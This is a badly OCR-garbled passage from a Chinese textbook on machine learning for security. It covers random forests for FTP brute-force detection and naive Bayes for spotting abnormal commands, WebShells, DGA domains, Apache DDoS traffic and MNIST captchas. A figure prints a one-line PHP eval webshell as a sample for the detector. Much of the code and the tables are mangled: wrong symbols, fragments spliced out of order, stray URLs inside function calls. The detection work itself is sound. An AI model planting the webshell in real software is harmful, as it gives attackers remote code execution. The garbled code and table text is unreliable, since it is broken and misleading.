6.6 示例 : hello world! 随机 森林 


为 了 对 比 决策 树 与 随机 和 森林， 我 们 使 用 同样 的 数据 集合 进行 测试 ， 导 入 需要 的 函数 库 : 















































>>> from sklearn.model selection import cross val score 
>>> from sklearn.datasets import make blobs 

>>> from sklearn.ensemble import RandomForestClassifier 
>>> from sklearn.ensemble import ExtraTreesClassifier 
>>> from sklearn.tree import DecisionTreeClassifier 








随机 生成 测试 样本 集合 : 











>>> X, y = make blobs (n samples-10000, n features-10, centers=100, 
http: //www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... random state-0) 




















使 用 决策 树 训练 ， 获 取 训 练 结果 : 











>>> clf = DecisionTreeClassifier (max depth-None, min samples split-2, 

http: //www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... random state=0) 
>>> scores = cross val score(clf, X, y) 

>>> Scores.mean() 

0.97http: / /www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... 









































使 用 随机 森林 训练 ， 获 取 训 练 结果 : 








>>> clf = RandomForestClassifier(n estimators-10, max depth-None, 

http: //www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... min samples split-2, random state-0) 
>>> scores = cross val score(clf, X, y) 

>>> Scores.mean() 

0.999http: / /www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/... 












































这 是 一 个 不 太 严 谨 的 对 比 ， 不 过 确实 可 以 说 明 一 些 问 题 ， 在 平时 遇 到 的 实际 情况 下 ， 随 机 森林 的 判决 性 能 优 于 决策 树 。 


6.7 示例 : 使 用 随机 森林 算 汉 检测 FTP 暴 力 破 解 


完整 演示 代码 请 见 本 书 GitHub 上 的 6-4.py。 

1. 数 据 搜集 和 数据 清洗 

继续 使 用 ADFA-LD 数 据 集中 FTP 暴 力 破解 的 相关 数据 ，ADFA-LD 数 据 集 详 细 介 绍 请 阅读 第 3 章 相 关内 容 。 

2. 特 征 化 

由 于 ADFA-LD 数 据 集 都 记录 了 函数 调用 序列 ， 每 个 文件 包含 的 函数 调用 序列 的 个 数 都 不 一 致 ， 可 以 参考 第 3 章 中 的 词 集 模型 进行 特征 化 。 具 体 思路 请 参考 6.4 节 。 
3. 训 练 样本 


实例 化 决策 树 和 随机 森林 算法 : 











Clfl = tree.DecisionTreeClassifier() 
clf2 = RandomForestClassifier(n estimators-10, 


























4. 效 果 验 证 


我 们 使 用 十 折 交 叉 验 证 。 








score=cross validation.cross val score(clfl, x, y, n jobs--1, cv-10) 
print np.mean (score) 
Score-cross validation.cross val score(clf2, x, y, n jobs--1, cv-10) 
print np.mean (score) mE 
































测试 结果 如 下 ， 决 策 树 准 确 率 约 为 96%， 随 机 森林 准确 率 约 为 98%。 


0.963786878688 
0.984888688869 


68 ”本章 小 结 


本 章 重 点 介绍 决策 树 和 随机 森林 的 基础 知识 及 其 在 Web 安 全 领域 的 相关 应 用 ， 包 括 检测 POP3 暴 力 破 解 、 检 测 FIP 暴 力 破 解 等 。 以 检测 FIP 暴 力 破解 这 个 例子 来 说 ， 在 同样 训练 数据 和 测试 数据 、 同 样 特 
征 提取 方式 的 情况 下 ， 随 机 森林 的 性 能 确实 优 于 决策 树 ， 结 合 我 们 的 实践 经 验 ， 也 推荐 在 这 样 的 情况 下 优先 考虑 使 用 随机 森林 工法 试 一 下 效果 。 


参考 资源 


我 写作 本 章 时 参考 了 以 下 网 站 ， 读 者 要 想 进一步 学 习 ， 欢 迎 到 这 些 网 站 进一步 了 解 更 多 信息 : 


W 


- https://www.ibm.com/developerworks/cn/analytics/library/ba-1507-decisiontree-algorithm/index.html 

: http://kdd.ics.uci.edu/databases/kddcup99 /kddcup99.html 

: http://www.freebuf.com/articles/system/97703.html 
还 有 一 些 参考 文献 值得 一 读 : 
[1] G Creech, J Hu.A Semantic Approach to Host-Based Intrusion Detection Systems Using Contiguous and Discontiguous System Call Patterns.Computers, IEEE Transactions on, 2013. 
[2] G Creech, J Hu.Generation of a New IDS Test Dataset: Time to Retire the KDD Collection. Wireless Communications& Networking Conference, 2013: 4487-4492. 


[3] MXie, J Hu, J Slay, Evaluating Host-Based Anomaly Detection Systems: Application of the One-Class SVM Algorithm to ADFA-LD.International Conference on Fuzzy Systems& Knowledge 


Discovery, 2014, 2000: 978-982. 


第 7 草 ”朴素 贝 叶 斯 算法 


朴素 贝 叶 斯 算法 可 能 是 机 器 学 习 里 面 名 气 最 大 的 算法 了 ， 对 I 本 技术 有 点 了 解 的 人 基本 上 都 知道 早期 垃圾 邮件 的 算法 就 使 用 了 朴素 贝 叶 斯 。 其 实 早 在 200 多 年 前 科学 家 就 提出 了 它 ， 并 给 出 了 数学 上 的 证 
明 ， 而 且 朴 素 贝 叶 斯 的 英文 简写 非常 抢眼 : NB 算法 ， 是 不 是 有 种 特别 NB 的 感觉 。 本 章 将 介绍 朴素 贝 叶 斯 算法 的 基本 概念 ， 并 给 出 基本 的 使 用 方式 ， 包 括 如 何 使 用 朴素 贝 叶 斯 算法 检测 异常 操作 、 检 测 DGA 


域名 、 检 测 针 对 Apache 的 DDoS 攻 击 、 检 测 基于 MNIST 数 据 集 的 验证 码 等 。 


7.1 朴素 贝 叶 斯 算 ; 去 概述 


垃圾 邮件 ( 见 图 7-1) 可 以 说 是 因特网 带 给 人 类 最 具 争 议 性 的 副产品 ， 它 的 泛滥 已 经 使 整个 因特网 不 堪 重 负 ， 它 严重 地 影响 了 人 们 的 日 党 办 公 和 人 生活。 通常 ， 企 业 和 大 型 邮件 服务 提供 商都 会 提供 拦截 垃 
圾 邮件 的 功能 ， 其 中 最 常见 的 一 种 算法 就 是 基于 朴素 贝 叶 斯 的 文本 分 类 算法 ， 大 体 思路 是 通过 学 习 大 量 的 垃圾 邮件 和 正常 邮件 样本 ， 让 朴素 贝 叶 斯 训练 出 文本 分 类 模型 。 





图 7-1 垃圾 邮件 


贝 叶 斯 分 类 是 一 系列 分 类 算法 的 总 称 ， 这 类 算法 均 以 贝 叶 斯 定理 为 基础 ， 故 统称 为 贝 叶 斯 分 类 。 其 中 朴素 贝 叶 斯 (Naive Bayesian, NB) 是 其 中 应 用 最 为 广泛 的 分 类 算法 之 一 。N8B 算 法 是 基于 贝 叶 斯 
定理 与 特征 条 件 独立 假设 的 分 类 方法 。 这 个 在 250 多 年 前 由 英国 数字 家 贝 叶 斯 ( 见 图 7-2) 发 明 的 算法 ， 在 信息 领域 内 有 着 无 与 伦比 的 地 位 。NB 基 于 一 个 简单 的 假定 : 给 定 目标 值 时 属性 之 间 相 互 条 件 独 


i 


Me 





A7-2  WerXpH 


同时 ，NB 所 需 估计 的 参数 很 少 ， 对 缺失 数据 不 太 敏 感 ， 算 法 也 比较 简单 。 理 论 上 ，NB 模 型 与 其 他 分 类 方法 相 比 具有 最 小 的 误差 


NB 发 源 于 古典 数学 理论 ， 有 着 坚实 的 数学 基础 以 及 稳定 的 分 类 效率 。 
这 个 假设 在 实际 应 用 中 往往 是 不 成 立 的， 这 给 NB 模型 的 正确 分 类 带 来 了 一 定 影响 。 


率 。 但 是 实际 上 并 非 总 是 如 此 ， 这 是 因为 NB 模型 假设 属性 之 间 相 互 独立 ， 
NB 包括 以 下 算法 : 
高 斯 朴素 贝 叶 斯 (Gaussian Naive Bayes) ; 
- SH RAK Met Be (Multinomial Naive Bayes) ; 


- AVA APA Net Br (Bernoulli Naive Bayes) o 


7.2 示例 : hello world! 朴素 贝 叶 斯 


导入 库 以 及 数据 集合 : 


>>> from sklearn import datasets 
>>> iris = datasets.load iris() 
>>> from sklearn.naive bayes import GaussianNB 

















训练 数据 集 : 





>>> gnb = GaussianNB () 


验证 结果 : 











>>> y pred = gnb.fit(iris.data, iris.target).predict (iris.data) 
>>> print ("Number of mislabeled points out of a total $d points : %d" 




















http: //www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/0l 








Number of mislabeled points out of a total 150 points : 6 





7.3. 示例 : 检测 异 单 操作 


在 第 5 章 中 ， 我 们 使 用 KNN 检 测 异 常 操作 ， 准 确 率 约 80% ， 不 是 很 理想 ; 本 章 基 于 同样 的 数据 集合 ， 使 用 NB 看 看 效果 如 何 。 完 整 演示 代码 请 见 本 书 CitHub 上 的 7-1.py。 


1 .数据 搜 集 和 数据 清洗 
See, RABE. 


2. 特 征 化 


本 次 我 们 使 用 词 集 模型 ， 统 计 全 部 操作 命令 ， 去 重 后 形成 字典 或 者 说 词汇 表 : 


with open(filename) as f: 
for line in f: 
line=line.strip('\n') 
dist.append (line) 
fdist = FreqDist (dist) .keys () 














通过 处 理 user3 用 户 的 全 部 命令 操作 ， 去 重 后 得 到 的 结果 为 : 








Dist:(['gs', 'tset', 'basename', 'uname', 'touch', 'find', 


以 该 词汇 表 作为 向 量 空 间 ， 将 每 个 命令 序列 转换 成 对 应 的 向 量 : 








def get user cmd feature new(user cmd list,dist): 
user cmd feature-[] 
for cmd list in user cmd list: 
v- [0] *len (dist) 
for i in range (0, len (dist)): 
if dist[i] in cmd list: 
v[i]+=1 i 
user cmd feature.append (v) 
return user cmd feature 




















3. 训 练 模型 


使 用 NB 训练 : 








clf = GaussianNB().fit(x train, y train) 


4. 效 果 验 证 


验证 效果 : 


y predict=clf.predict (x test) 
score-np.mean(y test--y predict) *100 





'In', 'unpack', 'jar', 'tail', 


vest 





'lp', 


EBPS/Text/... % 


DU t; 'ksh', 





(iris.data.shape[0], (iris.target !- y pred).sum())) 


"get", 


'xdm', 


'xterm', 


'cpio', 


'getpgrp', 


'grep', 


'gethost', 





准确 率 达 到 了 92%， 效 果 非 常 不 错 。 


7.4 示例 : 检测 WebShell (一 ) 


我 们 基于 WebShell 的 文本 特征 进行 WebShell 的 检测 。 我 们 将 互联 网 上 搜集 到 的 WebShell 作 为 黑 样 本 ， 当 前 最 新 的 wordpress 源 码 作 为 白 样 本 。 将 一 个 PHP 文 件 作为 一 个 字符 串 处 理 ， 以 基于 单词 的 2- 


gram 切 割 ， 遍 历 全 部 文件 形成 基于 2-gram 的 词汇 表 ， 如 图 7-3 所 示 。 然 后 ， 进 一 步 将 每 个 PHP 文 件 向 量化 。 完 整 演示 代码 请 见 本 书 GitHub 上 的 7-2.py。 





<? 


php @eval ($_ 
POST['c]) :2> 






php eval 


eval post 


POSLE 





m hE 





1 .数据 搜集 和 数据 清 


定义 函数 ， 用 于 将 PHP 文 件 转换 成 一 个 字符 串 : 












































def load file(file path): 
pz"" 
with open(file path) as f: 
for line in f: 
line=line.strip('\n') 
t+=line 
return t 


遍历 样本 集合 ， 将 全 部 PHP 文 件 以 字符 串 的 形式 加 载 : 

























































































def load files (path): 
files list-[] 
for r, d, files in os.walk (path): 
for file in files: 
if file.endswith('.php'): 

file path=path+file 
print "Load $s" $ file path 
t-load file(file path) 
files list. append (t) 

return files list 





针对 黑 样 本 集合 


webshell 
webshell 








files 


_bigram vectorizer = 


， 以 2-gram 算 





list-load 








xl-webshell . bigram : vectorizer. 
vocabulary-webshell bigram veci 





其 中 ， 
"ngtam_tange : 


: decode. ettor: 


- token pattern: 


2. 特 征 化 


设置 成 (2，2) 


Coun 


tVectorizer (ngram range- 


(2, 2), 




















fit transform(webshell . 








需要 特别 说 明 以 下 3 个 参数 。 


设置 成 ignore， 


设置 成 [\b\w+\b'， 


torizer.vocabulary 


， 表 明基 于 2-gram; 


表明 忽略 异常 字符 的 


表明 按照 单词 切割 。 


files ("http://www.hzcourse.com/resource/read 











E 7-3 基于 2-gram 获 取 词 汇 表 


法 生成 全 局 的 词汇 表 ， 其 中 2-gram 基 于 单词 切割 ， 所 以 设置 token 的 切割 方法 为 : 


decode error-"ignore",token pattern 
Book?path-/openresources/teach ebook/uncompressed/] 


r'\b\w+\b'. 


= r'\b\wt\b',min_ di 





files list) .toarray () 


使 用 黑 样 本 生成 的 词汇 表 vocabulary， 将 白 样 本 特征 化 ， 其 中 非常 重要 的 是 设置 CountVectorizer 范 数 的 vocabulary， 这 样 才能 


WP oran vedeorizer = CountVectorizer (ngram range= 
=] , vocabulary=vocabulary) 


token pattern 











wp files list=load 
x2=wp bigram vectorizer.fit t 





y2=[0]*len (x2) 





r'\b\wt\b',min df 








files ("http://www.hzcourse.com/resource/read 








ransform(wp . 








(2, 2), 














x=np.concatena 





1,x2)) 











y=np.concatena 





创建 NB 实例 : 





1, y2)) 





clf = GaussianNB() 


4. 效 果 验 证 


我 们 使 用 三 折 交 叉 验 证 ， 所 谓 k 折 交叉 验证 ， 就 是 将 数据 集 a 分 为 训 
， 剩 下 k- 


包 作 为 测试 集 


print 








东 集 


cross validation.cross val score(clf 





Hll 





测试 结果 如 下 ， 准 确 率 80% 左 右 ， 还 有 提升 空间 。 


[ 0.73584906 0.86538462 0.75 


7.5 示例 : 


Webshell 本 质 上 就 是 一 个 远程 管理 工具 ， 只 不 过 被 黑客 利用 了 。 


] 


检测 Webshell (Z) 


1 .数据 搜集 和 数据 清 


针对 黑 样 本 集合 ， 以 1-gram 算 法 生成 全 局 的 词汇 表 ， 其 中 1-gram 基 于 国 数 和 字符 串 常 


webshel] 











webshel] 


_bigram vectorizer = Count 
files list=load 











xl=webshell bigram vectorizer. 


Vectorizer (ngram range- 


files list).toarray() 




















小 一 


r X, y, n jobs--1,cv-3) 


(1, 1), 


























生成 的 词汇 表 如 下 : 


(u" 'qid' Ws 


81, u"'shellcode'": 


92, u'str roti3(': 


decode error-"ignore", 





测试 集 c， 





一 系列 管理 功能 本 质 上 








files ("http://www.hzcourse.com/resource/readi 
Fit transform(webshell 





328, u'getuid(' 


: 210, u'while(': 


一 系列 函数 调用 ， 于 是 我 们 将 


Book?path-/openresources/teach ebook/uncompressed/16472/0 





f=1) 
6472/OEBPS/Text/../data/PHP-webSHI 




















在 样本 量 不 充足 的 情况 下 ， 为 了 充分 利用 数据 集 对 算 


量 进行 切割 ， 所 以 设置 token 的 切割 方法 为 : 





files list) .toarray () 


348, u"'host'": 


50, u"'hkwwj'": 


法 效果 进 


试 针 对 函数 调用 建立 特征 。 


cg 


TOILE 


行 测试 ， 将 数据 集 a 随 机 分 为 k 个 包 ， 


r\b\w+\b\ (INNw V, 


decode error-"ignore", token pattern - r token pattern,min di 
Book?path-/openresources/teach ebook/uncompressed/16472/0E 





= 





f=1) 
BPS/Text/../data/PHP-webSHI 








49, à 





fatal(': 


174, u'ss(' 





ARIF SERRANT C RRITE: 


EBPS/Text/../data/wordpress/") 





: 324, u'connect ( 


ELL/xiaoma/") 


整 演示 代码 请 见 本 书 GitHub 上 的 7-3.py。 


ELL/xiaoma/") 


': 149, w 


中 一 个 


每 次 将 其 











fprintf 





2. 特 征 化 


使 用 黑 样 本 生成 的 词汇 表 vocabulary， 将 白 样 本 特征 化 : 











wp bigram vectorizer = CountVectorizer (ngram range-(2, 2), decode error-"ignore",token pattern = r token pattern,min df-1,vocabulary-vocabulary) 
wp files list-load files ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/wordpress/") 
x2-wp bigram vectorizer.fit transform(wp files list) .toarray () 



































3. 训 练 样本 


创建 NB 实例 : 


clf = GaussianNB() 


4. 效 果 验 证 


我 们 继续 使 用 三 折 交 叉 验 证 : 





print cross validation.cross val score(clf, x, y, n jobs--1,cv-3) 


测试 结果 如 下 ， 准 确 率 96% 左 右 ， 相 当 不 错 。 


[ 0.96226415 0.96153846 0.96153846] 





7.6 示例 : 检测 DGA 域 名 

域名 生成 算法 (Domain Generation Algorithm, DGA) 是 一 项 古老 但 一 直 活 路 的 技术 ， 是 中 心 结构 僵尸 网 络 燥 以 生存 的 关键 武器 ， 该 技术 给 打击 和 关闭 该 类 型 僵尸 网 络 造成 了 不 小 的 麻烦 。 研 究 人 员 
需要 快速 掌握 域名 生成 算法 和 输入 ， 以 便 对 生成 的 域名 及 时 进行 处 置 。 我 们 尝试 使 用 NB 算法 来 区 分 正常 域名 以 及 DGA 域 名 ，DGA 详 细 内 容 请 阅读 第 12 章 。 完 整 演示 代码 请 见 本 书 GitHub 上 的 7-4.py。 

1 数据 搜集 和 数据 清洗 


加 载 alexa 前 1000 的 域名 作为 白 样 本 ， 标 记 为 0， 分 别 加 载 cryptolocker 和 post-tovar-goz 家 族 的 DGA 域 名 ， 分 别 标记 为 2 和 3 : 

















E load alexa ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/top-1000.csv") 

x2 domain list load dga ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/dga-cryptolocke-1000.txt") 

x3 domain list = load dga ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/dga-post-tovar-goz-1000.txt") 
x domain list-np.concatenate((x1l domain list, x2 domain list,x3 domain list)) 

yl-[0]*len(x1l domain list) 
y2-[1]*len(x2 domain list) 
y3-[2]*len(x3 domain list) 
y-np.concatenate ((yl, y2,y3)) 


xl domain lis! 























Ct ct c1 



























































2. 特 征 化 


以 2-gram 处 理 DGA 域 名 ， 如 图 7-4 所 示 。 










‘ba’ ‘at’ "d 
‘du’ Suc’ PiHEEGE ba ai id du 


‘UC ‘CO’ ‘om’ 














baidu.com 





"GO" om: 





图 7-4 DGA 域 名 2-gram 处 理 


以 2-gram 分 隔 域 名 ， 切 割 单 元 为 字符 ， 以 整个 数据 集合 的 2-gram 结 果 作 为 词汇 表 并 进行 映射 ， 得 到 特征 化 的 向 量 : 


cv = CountVectorizer (ngram range-(2, 2), decode error-"ignore", 
token pattern=r"\w", min df-1) 
x= cv.fit transform(x domain list) .toarray () 




















3. 训 练 样本 


实例 化 NB 算法 : 


clf = GaussianNB() 





4. 效 果 验 证 


我 们 继续 使 用 三 折 交 叉 验 证 : 





print cross validation.cross val score(clf, x, y, n jobs--1,cv-3) 


测试 结果 如 下 ， 准 确 率 93% 左 右 ， 相 当 不 错 。 





[ 0.9491018 0.92992993 0.92792793] 


7.7 aN: 检测 针对 Apache 的 DDoS 攻击 


DDoS 攻击 通常 会 
的 详细 介绍 请 参考 第 3 章 的 相关 内 容 。 完 整 演示 代码 请 见 本 书 CitHub 上 的 7-5.py。 





， 尝 试 使 用 NB 算法 识别 针对 Apache 的 DDoS 攻 击 ( 见 图 7-5) 。 对 KDD 99 数 据 


与 DDoS 相关 特征 
网 络 连 接 


基本 特征 











KDD 99 
数据 
41 维特 征 


筛选 与 DDoS 基于 时 间 的 网 络 与 DDoS 相关 
相关 特征 流量 统计 特征 的 特征 向 量 


基于 主机 的 网 络 


流量 统计 特征 


图 7-5 “针对 Apache 的 DDoS 攻击 的 数据 处 理 流 程 


1. 数 据 搜 集 和 数据 清洗 


KDD 99 数 据 已 经 完成 了 大 部 分 的 数据 清洗 工作 ，KDD99 数 据 集中 每 个 连接 用 41 个 特征 来 描述 : 


, ; POE, , ,0,1,1,0.00,0.00,0.00,0.00,1.00,0.00,0.00,255,254,1.00,0.01,0.00,0.00,0.00,0.00,0.00,0.00,normal. 


















































0,udp, private, SF,105,146,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 

0,udp, private, SF,105,146,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0.00,0.00,0.00,0.00,1.00,0.00,0.00,255,254,1.00,0.01,0.00,0.00,0.00,0.00,0.00,0.00,normal. 
0,udp, private, SF,105,146,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0.00,0.00,0.00,0.00,1.00,0.00,0.00, 255, 254,1.00,0.01,0.00,0.00,0.00,0.00,0.00,0.00,normal 

0,udp, private, SF,105,146,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,2,0.00,0.00,0.00,0.00,1.00,0.00,0.00,255,254,1.00,0.01,0.00,0.00,0.00,0.00,0.00,0.00, snmpgetattack. 





其 中 和 DDoS 相关 的 特征 主要 为 : 
+ 网络 连 接 基 本 特征 ， 见 表 7-1。 
- 基于 时 间 的 网 络 流量 统计 特征 ， 见 表 7-2。 


表 7-1 KDD 99 与 DDoS 相关 的 网 络 连接 基本 特征 


特征 名 称 数据 类 型 内 容 描 述 
连接 持续 时 间 ， 以 秒 为 单位 ， 连 续 。 范 围 是 [0, 58329] 。 它 的 定义 是 从 TCP 连接 以 
3 次 握手 建立 算 起 ， 到 FIN/ACK 连接 结束 为 止 的 时 间 ; AA UDP 协议 类 型 ， 则 将 每 


Upp 数据 包 作为 一 条 连接 。 数 据 集中 出 现 大 量 的 duration = 0 的 情况 ， 是 因为 该 条 
连接 的 持续 时 间 不 足 1 秒 

src bytes MIENE A tre EPL BRN a, HES, TWA [0, 1379963888] 

dst_bytes MA tr ERLE EOL SEIN RL, HES, TAA [0. 1309937401] 

land 右 连 接 来 目 / 送 达 同 一 个 主机 / 9s A 1, AO, a, CELE O 2X 1 


THOU IUS d YES, ye [0, 3] 
加 急 包 的 个 数 ， 连 续 ， 范 围 是 [0, 14] 


表 7-2 KDD 99 与 DDoS 相关 的 基于 时 间 的 网 络 流量 统计 特征 


wrong fragment 


XR ONSE SEO ON 


urgent 


特征 名 称 数据 类 型 


count 连续 
srv count 连续 
serror rate. 连续 
srv serror rate 连续 
rerror rate 连续 
srv rerror rate 连续 
same srv rate 连续 
diff srv rate 连续 


rv_diff host rate 连续 


特征 名 称 


dst host count 


dst host srv count 


dst host same srv rate 


dst host diff srv rate 


特征 名 称 


dst host same src port rate 


dst host srv diff host rate 


dst host serror rate 


dst host srv serror rate. 


dst host rerror rate 


dst host srv rerror rate 


加 载 KDD 99 数 据 集中 的 数据 : 


内 容 描 述 
过 去 2 秒 内 ， 与 当前 连接 具有 相同 的 目标 主机 的 连 连续 ， 范 围 是 [0, 511] 
过 去 2 秒 内 ， 与 当前 连接 具有 相同 服务 的 连接 数 ， ， 范 围 是 [0, 511] 


过 去 2 秒 内 ， 在 与 当前 连接 具有 相同 目标 主机 的 连 na 出 现 “SYN ”错误 的 连接 
的 百分比 ， 连 续 ， 范 围 是 [0.00, 1.00] 

过 去 2 秒 内 ， 在 与 当前 连接 具有 相同 服务 的 连接 中 ， 出 现 “SYN ”错误 的 连接 的 百 
Syl, E, v HIE [0.00, 1.00]. 

过 去 2 秒 内 ， 在 与 当前 连接 具有 相同 目标 主机 的 连接 中 ， 出 现 “ REJ” 错 误 的 连接 
的 特 分 比 ， 连 续 ， 范 围 是 [0.00, 1.00] 

过 去 2 秒 内 ， 在 与 当前 连接 具有 相同 服务 的 连接 中 ， 出 现 “REJ” 错 误 的 连接 的 百 
TEL, VERE, WANA [0.00, 1.00] 

过 去 2 秒 内 ， 在 与 当前 连接 具有 相同 目标 主机 的 连接 中 ,与 当前 连接 具有 相同 服务 
的 连接 的 百分比 ， 连 续 ， 范 围 是 [0.00, 1.00] 

过 去 2 秒 内 ， 在 与 当前 连接 具有 相同 目标 主机 的 连接 中 ， 与 当前 连接 具有 不 同 服务 
的 连接 的 百分比 ， 连 续 ， 范 围 是 [0.00, 1.00]. 

过 去 2 秒 内 ， 在 与 当前 连接 具有 相同 服务 的 连接 中 ， 与 当前 连接 具有 不 同 目标 主机 
的 连接 的 百分比 ， 连 续 ， 范 围 是 [0.00, 1.00]. 











表 7-3 KDD 99 与 DDoS 相关 的 基于 主机 的 网 络 流量 统计 特征 


数据 类 型 内 容 摘 述 
连续 前 100 个 连接 中 ， 与 当前 连接 具有 相同 目标 主机 的 连接 数 ， 连 续 ， 范 围 
是 [0, 255] 


前 100 个 连接 中 ， 与 当前 连接 具有 相同 目标 主机 相同 服务 的 连接 数 ， 连 


Be 2x. TUE [0, 255] 
连续 .前 100 个 连接 中 ， 与 当前 连接 具有 相同 目标 主机 相同 服务 的 连接 所 占 
的 百分比 ， 连 组 ， 范 围 是 [0.00, 1.00] 
连续 前 100 个 连接 中 ， 与 当前 连接 具有 相同 目标 主机 不 同 服务 的 连接 所 占 的 
f 百分比 ， 连 续 ， 范 围 是 [0.00, 1.00] 
(2) 
数据 类 型 内 容 描 述 
连续 前 100 个 连接 中 ， 与 当前 连接 具有 相同 目标 主机 相同 源 端 口 的 连接 所 占 
的 百分比 ， 连 续 ， 范 围 是 [0.00, 1.00] 
连续 前 100 个 连接 中 ， 与 当前 连接 具有 相同 目标 主机 相同 服务 的 连接 中 ， 王 
当前 连接 具有 不 同 源 主机 的 连接 所 占 的 百分比 ， 连 续 ， 范 围 是 [0.00, 1.00] 
连续 前 100 个 连接 中 ， 号 当前 连接 具有 相同 目标 主机 的 连接 中 ， 出 现 
“SYN ”错误 的 连接 所 占 的 百分比 ， 连 续 ， 范 围 是 [0.00, 1.00] 
连续 前 100 个 连接 中 ， 与 当前 连接 具有 相同 目标 主机 相同 服务 的 连接 中 ， 出 
现 “SYN ”错误 的 连接 所 占 的 百分比 ， 连 续 ， 范 围 是 [0.00, 1.00] 
连续 前 100 个 连接 中 ， 与 当前 连接 具有 相同 目标 主机 的 连接 中 ， 出 现 “REJ” 
错误 的 连接 所 占 的 百分比 ， 连 续 ， 范 围 是 [0.00, 1.00] 
连续 前 100 个 连接 中 ， 与 当前 连接 具有 相同 目标 主机 相同 服务 的 连接 中 ， 出 


现 “REJ” 错 误 的 连接 所 占 的 百分比 ， 连 续 ， 范 围 是 [0.00, 1.00] 











def i. | kdd99 (filename) : 








wi with uc ei as f: 
line E: 














ines nc geste M 
line=line.split(',') 











x.append (line) 
return X 


筛选 标记 为 apache2 和 normal 且 是 http 协 议 的 数据 : 





f ( x1[41] in ['apache2.','normal.'] ) and ( x1[2] == 'http' ) : 

f x1[41] == 'apache2.': 

y.append (1) 

else: 
y.append (0) 





m 





H- 








2. 特 征 化 


挑选 与 DDoS 相 关 的 特征 作为 样本 特征 : 


xl = [x1[0]] + x1[4:8] *x1[22:30] *x1[31:40] 
v.append (x1) 
for xl in v : 
vi-[] 
for x2 in xl: 
vl.append (float (x2) ) 
w.append (v1) 

















3. 训 练 样本 


实例 化 NB 算法 : 








clf = GaussianNB() 





4. 效 果 验 证 


我 们 使 用 十 折 交 叉 验 证 : 





print cross validation.cross val score(clf, x, y, n jobs--1,cv-10) 





测试 结果 如 下 ， 准 确 率 99% 左 右 ， 相 当 不 错 。 


[ 0.99925094 0.99875156 0.99950062 0.99950062 0.996004 0.9995005 
0.997003 0.98975768 0.99975019 0.99925056] 


7.8 示例 : 识别 验证 码 


MNIST 是 一 个 入 门 级 的 计算 机 视觉 数据 集 ， 它 包含 各 种 手写 数字 图 片 ， 也 包含 每 一 张 图 片 对 应 的 标签 ， 告 诉 我 们 这 个 是 数字 几 。 我 们 使 用 朴素 贝 叶 斯 来 识别 由 M NIST 组 成 的 验证 码 。 完 整 演示 代码 请 见 
本 书 GitHup 上 的 7-6.py。 


1 .数据 搜集 和 数据 清洗 


使 用 MNIST 离 线 版 的 数据 ， 具 体 下 载 地 址 以 及 数据 集 的 介绍 请 参考 第 3 章 相 关内 容 : 








def load data(): 
with gzip.open('http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/MNIST/mnist.pkl.gz') as fp: 
training data, valid data, test data - pickle.load(fp) 

return training data, valid data, test data 


















































2. 特 征 化 
MNIST 已 经 将 24x24 的 图 片 特征 化 成 长 度 为 784 的 一 维 向 量 。 
3. 训 练 模型 


使 用 NB 训练 : 





training data, valid data, test data-load data() 
X1,yl-training data 

x2,y2=test data 
clf = GaussianNB() 
c] t(xl, yl) 


























lis 





4. 效 果 验 证 


验证 效果 : 








print cross validation.cross val score(clf, x2, y2, scoring-"accuracy") 
准确 率 55% 左 右 ， 效 果 非 常 不 理想 ， 事 实 上 NB 算法 在 非 黑 即 白 的 二 分 类 问题 上 使 用 广泛 ， 但 是 在 多 分 类 问题 上 的 表现 确实 不 如 其 他 算法 : 


[ 0.53684841 0.58385839 0.6043857 | 


79 ”本章 小 结 


本 章 重 点 介绍 朴素 贝 叶 斯 的 基础 知识 以 及 Web 安 全 领域 的 相关 应 用 ， 涉 及 WebShell 检 测 、DGA 域 名 检测 、 针 对 Apache 的 DDoS 检测 等 。 杆 素 贝 叶 斯 作为 最 知名 也 可 能 是 历史 最 悠久 的 机 器 学 习 算 法 ， 已 经 


默默 为 人 类 奉献 了 多 年 ， 至 今 仍 在 很 多 领域 发 挥 着 作用 。 


参考 资源 
我 写作 本 章 时 参考 了 以 下 网 站 ， 读 者 要 想 进一步 学 习 ， 欢 迎 到 这 些 网 站 进一步 了 解 更 多 信息 : 


- http://blog.csdn.net/liyuefeilong/atticle/ details/48448991 

: https://en.wikipedia.org/wiki/MNIST_database 

- http://www.freebuf.com/articles/network/114693.html 
还 有 一 些 参考 文献 值得 一 读 : 

[1] Antonakakis M, Perdisci R, Dagon D, Lee W, Feamster N.Building a Dynamic Reputation System for DNS.Usenix Security Symposium, 2010: 273-290. 

[2] Antonakakis M, PerdisciR, Lee W, Vasiloglou N, Dagon D.Detecting Malware Domains at the Upper DNS Hierarchy. Usenix Conference on Security, 2011: 27-27. 


[3] Antonakakis M, PerdisciR, Nadji Y, Vasiloglou N, Abu-Nimeh S, Lee W, Dagon D.From Throw-Away Traffic to Bots: Detecting the Rise of DGA-Based Malware.Usenix Conference on Security 


Symposium, 2011: 24-24. 


[4] Bilge L, Kirda E, Kruegel C, Balduzzi M.Exposure: Finding Malicious Domains Using Passive DNS Analysis. Network&Distributed System Security Symposium, 2011. 


第 8 草 ”逻辑 回归 算法 


